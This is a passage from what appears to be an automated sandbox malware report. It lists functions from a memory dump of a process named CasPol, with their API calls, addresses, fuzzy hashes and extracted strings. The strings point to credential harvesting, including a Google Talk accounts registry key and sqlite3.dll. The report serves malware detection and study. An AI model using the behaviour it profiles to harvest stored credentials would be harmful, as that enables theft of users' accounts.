                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • memset.MSVCRT ref: 00408671
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                  • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                  • API String ID: 1366857005-1079885057
                                                                                                                                                                                  • Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                  • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                                  Function 00410DBB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                  • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                  • API String ID: 3929982141-2036018995
                                                                                                                                                                                  • Opcode ID: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                  • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                  Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                                  • API String ID: 882979914-1578091866
                                                                                                                                                                                  • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                  • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                  • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                  Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                    • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                  • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3143880245-0
                                                                                                                                                                                  • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                  • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                  • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                  • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                  Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                                  • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                  • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                  • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                  Function 00402A14 Relevance: 4.5, APIs: 3, Instructions: 49registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00402A34
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                                                                                                                                                                                  • RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close$Enummemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1615280680-0
                                                                                                                                                                                  • Opcode ID: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                  • Instruction ID: 4e227b58271400dae14a407a15e496f509ceac9baab3320f2be5fe13b191b239
                                                                                                                                                                                  • Opcode Fuzzy Hash: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                  • Instruction Fuzzy Hash: D10179B590000CFFEB21EF51CD81EEA776DDF50388F100076BA84A1051E6759E959A64
                                                                                                                                                                                  Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                  • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3056473165-0
                                                                                                                                                                                  • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                  • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                  • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                  • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                  Function 00410B1E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                  • String ID: sqlite3.dll
                                                                                                                                                                                  • API String ID: 3677997916-1155512374
                                                                                                                                                                                  • Opcode ID: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                  • Instruction ID: 87b963fc64edc678a4f0440c700721264c86d0e3755c9c93a3ce53f579e10251
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DE0C972A00119BBDF11AF91DD06ADA7BA9EF14298B000061FD0591221E776DEA4EAD4
                                                                                                                                                                                  Function 00406D01 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID: eBD
                                                                                                                                                                                  • API String ID: 823142352-44267735
                                                                                                                                                                                  • Opcode ID: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                  • Instruction ID: a89d01311c626acd6708100a1c920bed7e48ab8185d3fa7f8c0eae74851e3e32
                                                                                                                                                                                  • Opcode Fuzzy Hash: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
                                                                                                                                                                                  • Instruction Fuzzy Hash: 10C012B0250300BEFF214F10EC46F37355DE740700F300424BE00F40E1C1A14D10C928
                                                                                                                                                                                  Function 0044B3CF Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                  • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                                                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                  • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                                                  Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen$_strcmpimemset
                                                                                                                                                                                  • String ID: /stext
                                                                                                                                                                                  • API String ID: 520177685-3817206916
                                                                                                                                                                                  • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                  • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                  Function 0044B40E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                  • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                  • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                                                                                                                                                                  Function 00402B22 Relevance: 3.1, APIs: 2, Instructions: 59registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00402B44
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 00402BBD
                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • Part of subcall function 00402A9D: memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                    • Part of subcall function 00402A9D: RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Closememset$EnumOpenmemcpystrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1880195650-0
                                                                                                                                                                                  • Opcode ID: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                  • Instruction ID: a6739743e39ca8df578777331d88ee5d3d666d95225ddaf8fc8e93cdb73399e2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5347bd042121d238431eb3b74689eb21bcf5dbb0349685f5868c10f604f2f03d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4811B975904109EFEB10DF95CD41ED9B77CEF20348F1004BAF988A2151EAB5AAC49B14
                                                                                                                                                                                  Function 0044B42B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                  • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                                                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                                                  Function 004029A2 Relevance: 3.0, APIs: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiQueryValueWidememcpystrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1208763047-0
                                                                                                                                                                                  • Opcode ID: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                  • Instruction ID: 6870f833a154d6718f5b937b5a7666aa62b37853351f5b72213b77096f12c34b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f072e78ae8ff50dccfb82ea1f6cac8499066c39a16d5267ba4970c6d85a246b
                                                                                                                                                                                  • Instruction Fuzzy Hash: BE0162B2504209FEEB119BA09CC9DABBB6CEB14358F108277F605B51C1DA749E589A28
                                                                                                                                                                                  Function 00402A9D Relevance: 3.0, APIs: 2, Instructions: 48registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00402ABC
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 00402B17
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • Part of subcall function 00402A14: memset.MSVCRT ref: 00402A34
                                                                                                                                                                                    • Part of subcall function 00402A14: RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Closememset$EnumOpen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1938129365-0
                                                                                                                                                                                  • Opcode ID: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                  • Instruction ID: 075d2aef54253d1e507a5189515eddc1e36b9bc69c6417a4805569c48a28632c
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff5bff4591526617d1ef2bbbe04e9814357c404b1ae9404dde4026702917bfc3
                                                                                                                                                                                  • Instruction Fuzzy Hash: E801ACB590010DAFEB20EF95CD85EEAB76CDF2434CF000076F544A1051FBB9AE989B64
                                                                                                                                                                                  Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 145871493-0
                                                                                                                                                                                  • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                  • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                  • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                                                  • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                  Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4165544737-0
                                                                                                                                                                                  • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                  • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                  Function 00410B62 Relevance: 1.5, APIs: 1, Instructions: 18registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
